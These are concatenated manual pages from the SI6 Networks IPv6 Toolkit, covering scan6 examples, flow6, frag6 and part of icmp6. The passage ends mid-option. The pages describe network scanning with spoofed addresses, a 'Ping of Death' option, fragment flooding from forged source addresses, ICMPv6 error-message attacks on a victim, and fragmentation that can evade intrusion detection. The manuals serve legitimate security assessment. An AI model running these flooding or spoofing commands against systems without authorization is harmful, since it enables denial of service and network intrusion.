'Dell Inc' \-p tcp Scan for network devices manufactured by 'Dell Inc' in the target prefix fc00::/64. The tool will employ TCP segments as the probe packets (rather than the default ICMPv6 echo requests). \fBExample #6\fR # scan6 \-i eth0 \-L \-S 66:55:44:33:22:11 \-p unrec \-P global \-v Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). The Ethernet Source Address is set to "66:55:44:33:22:11" ("\-S" option). The probe packets will be IPv6 packets with unrecognized options of type 10xxxxxx ("\-p" option). The tool will only print IPv6 global addresses ("\-P" option). The tool will be verbose. \fBExample #7\fR # scan6 \-d 2001:db8::/64 \-w KNOWN_IIDS Perform an address scan of a set of known hosts listed in the file KNOWN_IIDS, at remote network 2001:db8::/64. The target addresses are obtaining by concatenating the network prefix 2001:db8::/64 with the interface IDs of each of the addresses fund in the file KNOWN_IIDS. \fBExample #8\fR # scan6 \-i eth0 \-L \-P global \-\-print\-unique \-e Use the "eth0" interface ("\-i" option) to perform host-scanning on the local network ("\-L" option). Print only global unicast addresses ("\-P" option), and at most one IPv6 address per Ethernet address ("\-\-print\-unique" option). Ethernet addresses will be printed along with the corresponiding IPv6 address ("\-e" option). \fBExample #9\fR # scan6 \-m knownprefixes.txt \-w knowniids.txt \-l \-z 60 \-t \-v Build the list of targets from the IPv6 prefixes contained in the file 'knownprefixes.txt' and the Interface IDs (IIDs) contained in the file 'knowniids.txt'. Poll the targets periodically ("\-l" option), and sleep 60 seconds after each iteration ("\-z" option). Print a timestamp along the IPv6 address of each alive node ("\-t" option). Be verbose ("\-v" option). .SH AUTHOR The .B script6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2014\-2015 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/flow6.1000066400000000000000000000147031254360455000171760ustar00rootroot00000000000000.TH FLOW6 1 .SH NAME flow6 \- A security assessment tool for the IPv6 Flow Label field .SH SYNOPSIS .B flow6 .RB [\| \-i .IR INTERFACE\| ] .BI \-d \|\ DST_ADDR .RB [\| \-S .IR LINK_SRC_ADDR\| ] .RB [\| \-D .IR LINK_DST_ADDR\| ] .RB [\| \-s .IR SRC_ADDR \|[/\| LEN \|]] .RB [\| \-A .IR HOP_LIMIT \|] .RB [\| \-P .IR PROTOCOL \|] .RB [\| \-p .IR PORT \|] .RB [\| \-W \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B flow6 performs a security assessment of the Flow Label generation policy of a target node. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .B flow6 sends a number of probe packets to the target node, and samples the Flow Label values of the corresponding response packets. Based on the sampled values, it tries to infer the Flow Label generation policy of the target. .PP The tool will first send a number of probe packets from single IPv6 address, such that the per-destination policy is determined. The tool will then send probe packets from random IPv6 addresses (from the same prefix as the first probes) such that the "global" Flow Label generation policy can be determined. .PP The tool computes the expected value and the standard deviation of the difference between consecutive-sampled Flow Label values (Labeln \- Labeln\-1) with the intent of inferring the Flow Label generation algorithm of the target node. .PP If the standard deviation of [Labeln \- Labeln\-1] is 0, the Flow Label is assumed to be set to a constant value, and the corresponding value is informed to the user. For small values of the standard deviation, the Flow Label is assumed to be a monotonically\-increasing function with increments of the "expected value", and such "expected value" together with the standard deviation, are informed to the user. For large values of the standard deviation, the Flow Label is assumed to be randomized, and the expected value and standard deviation are informed to the user, as indicators of the "quality" of the Flow Label generation algorithm. .SH OPTIONS .B flow6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified alon with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the probe packets. If an IPv6 prefix is specified, the IPv6 Source Address of the ICMPv6 packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets (currently, only Ethernet is supported). If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets (currently, only Ethernet is supported). By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first\-hop router. .TP .BI \-P\ PROTOCOL ,\ \-\-protocol\ PROTOCOL This option specifies the protocol type of the probe packets. Currently, both "UDP" and "TCP" are supported. If this option is left unspecified, the protocol type defaults to "TCP". .TP .BI \-p\ PORT ,\ \-\-dst\-port\ PORT This option specifies the Destination Port of the probe packets. If left unspecified, the Destination Port defaults to "80" when the IPv6 payload is TCP, and to 53 if the IPv6 payload is UDP. Note: Since it is vital for the tool to receive response packets to be able to infer the Flow Label algorithm of the target, the protocol type and Destination Port should be carefully selected (i.e., the corresponding protocol and Destination Port should not be filter, and the target should respond to packets sent to that protocol/port). .TP .BR \-W,\ \-\-flow\-label\-policy This option instructs the tool to determine the Flow Label generation policy. As of this version of the tool, this option must be specified. .TP .BR \-v\| ,\ \-\-verbose This option instructs the flow6 tool to be verbose. If this option is set twice, the tool is "very verbose", and outputs the sampled Flow Label values (in addition to other information). .TP .BR \-h\| ,\ \-\-help Print help information for the .B flow6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B flow6 tool. \fBExample #1\fR # flow6 \-i eth0 \-\-flow-label-policy \-d fe80::1 \-v Assess the Flow Label generation policy of the host "fe80::1", using the network interface "eth0". Probe packets are TCP segments directed to port 80 (default). Be verbose. In this example, since the IPv6 destination address is a link-local address, the network interface ccard must be explicitly specified. \fBExample #2\fR # flow6 \-d 2001:db8::1 \-\-flow\-label\-policy \-P TCP \-p 22 \-vv Assess the Flow Label generation policy of the host "2001:db8::1". Probe packets are TCP segments directed to port 22. Be very verbose (i.e., list the sampled Flow Label values). .SH AUTHOR The .B flow6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/frag6.1000066400000000000000000000253411254360455000171460ustar00rootroot00000000000000.TH FRAG6 1 .SH NAME frag6 \- A security assessment tool for IPv6 fragmentation .SH SYNOPSIS .B frag6 .RB [\| \-i .IR INTERFACE\| ] \-d DST_ADDR [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-A HOP_LIMIT] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-P FRAG_SIZE] [\-O FRAG_TYPE] [\-o FRAG_OFFSET] [\-I FRAG_ID] [\-T] [\-n] [\-p | \-W | \-X | \-F N_FRAGS] [\-l] [\-z SECONDS] [\-v] [\-h] .SH DESCRIPTION .B frag6 is a security assessment tool for attack vectors based on IPv6 fragments. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment and trouble-shooting suite for the IPv6 protocols. .SH OPTIONS .B frag6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets. If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets. By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first-hop router. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the outgoing packets. If an IPv6 prefix is specified, the IPv6 Source Address of the outgoing packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-P\ FRAG_SIZE ,\ \-\-frag\-size\ FRAG_SIZE This option specifies the IPv6 fragment payload size. .TP .BI \-O\ FRAG_TYPE ,\ \-\-frag\-type\ FRAG_TYPE This option specifies the fragment "type". Possible types are "first", "middle", "last", and "atomic". If the selected fragment type is "first", the Fragment Offset is automatically set to 0, and the "M" ("More fragments") bit is set to 1. If the selected fragment type is "middle", the Fragment Offset is set to a non-zero value, and the "M" bit is set to 1. If the selected fragment type is "last", the Fragment Offset is set to a non-zero value, and the "M" bit is set to 0. Finally, if the selected fragment type is "atomic", the Fragment Offset is set to 0, and the "M" bit is set to 0. .TP .BI \-o\ FRAG_OFFSET ,\ \-\-frag\-offset\ FRAG_OFFSET This option specifies the Fragment Offset. The Fragment Offset specified by means of this option overrides the value implicitly specified by means of the "\-O" option. .TP .BI \-I\ FRAG_ID ,\ \-\-frag\-id\ FRAG_ID This option specifies the fragment "Identification" value. If left unspecified, the "Identification" value is randomized. .TP .BR \-T\| ,\ \-\-no\-timestamp When assessing the fragment reassembly policy of a target, the fragment payload includes a timestamp value that is used to measure the fragment reassembly timeout. If this option is set, such timestamp will not be included in the payload (and the tool will not be able to measure the fragment reassembly timeout). .TP .BR \-n\| ,\ \-\-no\-responses This option instructs the frag6 tool not to display the responses to the fragments sent. This option is useful when performing a fragmentation-flooding attack, as multiple response packets (ICMPv6 errors) might be received. .TP .BR \-p\| ,\ \-\-frag\-reass\-policy This option instructs the tool to determine the IPv6 fragment reassembly policy of the target. In order to determine the aforementioned policy, the tool performs a number of tests to determine how the target node processes overlapping fragments. The following figures illustrate the sequence of packets that correspond to each of the tests. .TP \fB Test #1\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAAA Frag. #2: BBBBBBBBBBB .fi .RE \fB Test #2\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC .fi .RE \fB Test #3\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC .fi .RE \fB Test #4\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCCCCCCCCCCCCCCCCC .fi .RE \fB Test #5\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAA Frag. #2: BBBBBBBBBBB Frag. #3: CCCCCCCCCCC Frag. #4: DDDDDDDD .fi .RE .TP For each of the aforementioned tests, the tool reports which copy of the data is used by the target host. If there is no response from the host, the tool informs whether the host silently dropped the fragments, or sent an ICMPv6 Time Exceeded error message. .TP .BR \-W\| ,\ \-\-frag\-id\-policy This option instructs the tool to determine the fragment "Identification" generation policy. The tool sends a number of probe packets to the target node, and samples the "Identification" values of the corresponding response packets. Based on the sampled values, it tries to infer the fragment Identification generation policy of the target. The tool will first send a number of fragments from single IPv6 address, such that the per-destination policy is determined. The tool will then send a number of fragments from random IPv6 addresses (from the same prefix as the first fragments) such that the "global" fragment Identification generation policy can be inferred. The tool computes the expected value and the standard deviation of the difference between consecutive-sampled Identification values (IDn – IDn-1), with the intent of inferring the fragment Identification algorithm at the target node. For small values of the standard deviation, the fragment Identification is assumed to be a monotonically-increasing function with increments of the "expected value". For large values of the standard deviation, the fragment Identification is assumed to be randomized, and the expected value and standard deviation are informed to the user, as indicators of the "quality" of the fragment Identification generation algorithm. .TP .BR \-X\| ,\ \-\-pod\-attack This option instructs the tool to perform a "Ping of Death" attack against the specified target. .TP .BI \-F\ FRAG_NUMBER ,\ \-\-flood\-frags\ FRAG_NUMBER This option instructs the tool to send the specified number of fragments back-to-back to the target node. This option is likely to be used in conjunction with the "\-l" option, such that the process is repeated in a loop. .TP .BR \-l\| ,\ \-\-loop This option instructs the frag6 tool to periodically send IPv6 fragments to the target node. The amount of time to pause between sending a batch of fragments can be specified by means of the "\-z" option, and defaults to 1 second. .TP .BI \-z\ SECONDS ,\ \-\-sleep\ SECONDS This option specifies the amount of time that the tool should pause between sending btaches of IPv6 fragments (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BR \-v\| ,\ \-\-verbose This option instructs the frag6 tool to be verbose. If this option is set twice and the \-W option was set, the tool outputs the sampled Fragment Identification values (in addition to other information). .TP .BR \-h\| ,\ \-\-help Print help information for the .B frag6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B frag6 tool. \fBExample #1\fR # frag6 \-\-frag\-id\-policy \-d fc00:1::1 \-v Assess the fragment Identification generation policy of the host "fc00:1::1". Be verbose. \fBExample #2\fR # frag6 \-\-frag\-reass\-policy \-d fc00:1::1 \-v Assess the fragment reassembly policy of the host "fc00:1::1". Be verbose. \fBExample #3\fR # frag6 \-\-frag\-type atomic \-d fc00:1::1 \-v Send an IPv6 atomic fragment to the host "fc00:1::1". Be verbose. \fBExample #4\fR # frag6 \-s ::/0 \-\-flood\-frags 100 \-l \-z 5 \-d fc00:1::1 \-v Send 100 fragments (every 5 seconds) to the host fc00:1::1, using a forged IPv6 Source Address from the prefix ::/0. The aforementioned fragments should have an offset of 0, and the M bit set (i.e., be first-fragments). Be verbose. .SH AUTHOR The .B frag6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/manuals/icmp6.1000066400000000000000000000445561254360455000171700ustar00rootroot00000000000000.TH ICMP6 1 .SH NAME icmp6 \- A security assessment tool for attack vectors based on ICMPv6 packets .SH SYNOPSIS .B icmp6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-c HOP_LIMIT] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-t TYPE[:CODE] | \-e CODE | \-A CODE \-V CODE \-R CODE] [\-r TARGET_ADDR] [\-x PEER_ADDR] [\-c HOP_LIMIT] [\-m MTU] [\-O POINTER] [\-p PAYLOAD_TYPE] [\-P PAYLOAD_SIZE] [\-n] [\-a SRC_PORTL[:SRC_PORTH]] [\-o DST_PORTL[:DST_PORTH]] [\-X TCP_FLAGS] [\-q TCP_SEQ] [\-Q TCP_ACK] [\-V TCP_URP] [\-w TCP_WIN] [\-M] [\-j PREFIX[/LEN]] [\-k PREFIX[/LEN]] [\-J LINK_ADDR] [\-K LINK_ADDR] [\-b PREFIX[/LEN]] [\-g PREFIX[/LEN]] [\-B LINK_ADDR] [\-G LINK_ADDR] [\-f] [\-L | \-l] [\-z] [\-v] [\-h] .SH DESCRIPTION .B icmp6 allows the assessment of IPv6 implementations with respect to a variety of attack vectors based on ICMPv6 error messages. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 Protocols. This tool has two modes of operation: "active" and "listening". In active mode, the tool attacks a specific target without listening to any incoming traffic, while in "listening" mode the tool listens to traffic on the local network, and launches an attack in response to such traffic. Active mode is employed if an IPv6 Destination Address is specified. "Listening" mode is employed if the "\-L" option (or its long counterpart "\-\-listen") is set. If both an attack target and the "\-L" option are specified, the attack is launched against the specified target, and then the tool enters "listening" mode to respond incoming packets with ICMPv6 error messages. The tool supports filtering of incoming packets based on the Ethernet Source Address, the Ethernet Destination Address, the IPv6 Source Address, and the IPv6 Destination Address. There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and the incoming packet matches any of those filters, the message is discarded (and thus no ICMPv6 error messages are sent in response). If any "accept filter" is specified, incoming packets must match the specified filters in order for the tool to respond with ICMPv6 error messages. .SH OPTIONS .B icmp6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). The icmp6 tool supports IPv6 fragmentation, which might be of use to circumvent layer-2 filtering and/or Network Intrusion Detection Systems (NIDS). However, IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, or the "listening" ("\-L") mode is selected, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the attack packets. If a prefix is specified, the Source Address is randomly selected from that prefix. If this option is left unspecified, the IPv6 Source Address of the attack packets is randomly selected from the prefix ::/0. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the victim. It can be left unspecified only if the "\-L" option is selected (that is, if the tool is to operate in "listening" mode). When operating in "listening" mode ("\-L" option), the IPv6 Destination Address is selected according to the IPv6 Source Address of the incoming packet. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the attack packets. If left unspecified, the link\-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the attack packets. If left unspecified, it is set to that of the local router (for non-local destinations) or to that corresponding to the destination host (for local hosts). When operating in "listening" mode, the link\-layer Destination Address is set to the link\-layer Source Address of the incoming packet. .TP .BI \-c\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the Redirect messages. If this option is left unspecified, the Hop Limit is randomized to a value between 64 and 243. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the ICMPv6 error messages must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-t\ TYPE ,\ \-\-icmp6\ TYPE This option specifies the Type and Code of the ICMPv6 error message in the form "\-\-icmp6 TYPE:CODE". If left unspecified, the ICMPv6 error message defaults to "Parameter Problem, Erroneous header field encountered" (Type 4, Code 0). Note: Other options (such as "\-\-icmp6\-unreachable") provide an alternative for setting the ICMPv6 Type and Code. .TP .BR \-e\| ,\ \-\-icmp6\-dest\-unreach This option sets the ICMPv6 Type to "1" (Destination Unreachable), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-dest-unreach CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-E\| ,\ \-\-icmp6\-packet\-too\-big This option sets the ICMPv6 Type to "1", and the ICMPv6 Code to "0" (Packet Too Big). Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-A\| ,\ \-\-icmp6\-time\-exceeded This option sets the ICMPv6 Type to "3" (Time Exceeded), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-time-exceeded CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BR \-R\| ,\ \-\-icmp6\-param\-problem This option sets the ICMPv6 Type to "4" (Parameter Problem), and allows the user to specify the ICMPv6 Code, in the form "\-\-icmp6\-param-problem CODE". Note: this option is an alternative to the "\-t" option for setting the ICMPv6 Type and Code. .TP .BI \-m\ MTU ,\ \-\-mtu\ MTU This specifies the value of the "MTU" field of ICMPv6 Packet Too Big error messages. .TP .BI \-O\ POINTER ,\ \-\-pointer\ POINTER This option specifies the value of the "Pointer" field of ICMPv6 Parameter Problem error messages. .TP .BI \-p\ TYPE ,\ \-\-payload\-type\ TYPE This option specifies the payload type to be included in the ICMPv6 Payload. Currently supported payloads are "TCP", "UDP", and "ICMP6". The payload-type defaults to "TCP". When the tool operates in "Listening" mode, this option specifies the type of packets the tool will listen to. In listening mode, an additional type can be specified: "IP6"; this will cause the tool to listen to all IPv6 traffic. .TP .BI \-P\ SIZE ,\ \-\-payload\-size\ SIZE Size of the payload to be included in the ICMPv6 Payload (with the payload type being specified by the "\-p" option). By default, as many bytes as possible are included, without exceeding the minimum IPv6 MTU (1280 bytes). .TP .BR \-n\| ,\ \-\-no\-payload This option specifies that no payload should be included within the ICMPv6 error message. .TP .BI \-C\ HOP_LIMIT ,\ \-\-ipv6\-hlim\ HOP_LIMIT This option specifies the Hop Limit of the IPv6 packet included in the payload of the ICMPv6 error message. If this option is left unspecified, the Hop Limit is randomized to a value between 64 and 243. .TP .BI \-r\ ADDRESS ,\ \-\-target\-addr\ ADDRESS This option specifies the Source Address of the IPv6 packet that is embedded in the ICMPv6 error message. If left unspecified, it is set to the same address as the IPv6 Destination Address of the outer packet. When operating in "Listening mode", the tool automatically embeds a piece of the received packet (unless otherwise specified by the "\-n" option), and hence the IPv6 Source Address of the embedded IPv6 packet is set accordingly. .TP .BI \-x\ ADDRESS ,\ \-\-peer\-addr\ ADDRESS This option specifies the Destination Address of the IPv6 packet that is embedded in the ICMPv6 error message. If left unspecified, it is set to a random value. When operating in "Listening mode", the tool automatically embeds a piece of the received packet (unless otherwise specified by the "\-n" option), and hence the IPv6 Destination Address of the embedded IPv6 packet is set accordingly. Note: since the victim host is expected to check that the ICMPv6 error message corresponds to an ongoing communication instance, when operating in "active mode", this option should be set to a value that corresponds to an ongoing communication instance. .TP .BI \-o\ PORT ,\ \-\-target\-port\ PORT This option specifies the Source Port of the TCP or UDP packet contained in the ICMPv6 Payload. If a port range is specified in the form "\-o LOWPORT:HIGHPORT" the tool will send one ICMPv6 error message for each port in that range. Note: This option is meaningful only if "TCP" or "UDP" have been specified (with the "\-p" option). .TP .BI \-a\ PORT ,\ \-\-peer\-port\ PORT This option specifies the Destination Port of the TCP or UDP packet contained in the ICMPv6 Payload. If a port range is specified in the form "\-o LOWPORT:HIGHPORT" the tool will send one ICMPv6 error message for each port in that range. Note: This option is meaningful only if "TCP" or "UDP" have been specified (with the "\-p" option). .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS This option specifies the flags of the TCP header contained in the ICMPv6 Payload. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If left unspecified, only the "ACK" bit is set. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-q\ SEQ_NUMBER ,\ \-\-tcp\-seq\ SEQ_NUMBER This option specifies the Sequence Number of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Sequence Number is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-Q\ ACK_NUMBER ,\ \-\-tcp\-ack\ ACK_NUMBER This option specifies the Acknowledgment Number of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Acknowledgment Number is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-V\ URG_POINTER ,\ \-\-tcp\-urg\ URG_POINTER This option specifies the Urgent Pointer of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Urgent Pointer is set to 0. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-w\ TCP_WIN ,\ \-\-tcp\-win\ TCP_WIN This option specifies the Window of the TCP header contained in the ICMPv6 Payload. If left unspecified, the Window is randomized. Note: This option is meaningful only if "TCP" has been specified (with the "\-p" option). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (currently, only Ethernet is supported). .TP .BR \-f\| ,\ \-\-sanity\-filters This option automatically adds a "block filter" for the IPv6 Source Address of the packets. Note: This option may be desirable when the tool operates in "Listening mode" and is instructed to listen to "ICMP6" or "IP6" packets (thus possibly avoiding packet loops). .TP .BR \-l\| ,\ \-\-loop This option instructs the icmp6 tool to send periodic ICMPv6 error messages to the victim node. The amount of time to pause between sending ICMPv6 error messages can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP .BR \-z\| ,\ \-\-sleep This option specifies the amount of time to pause between sending ICMPv6 error messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BR \-L\| ,\ \-\-listen This instructs the icmp6 tool to operate in "Listening" mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP .BR \-v\| ,\ \-\-verbose This option instructs the icmp6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP .BR \-h\| ,\ 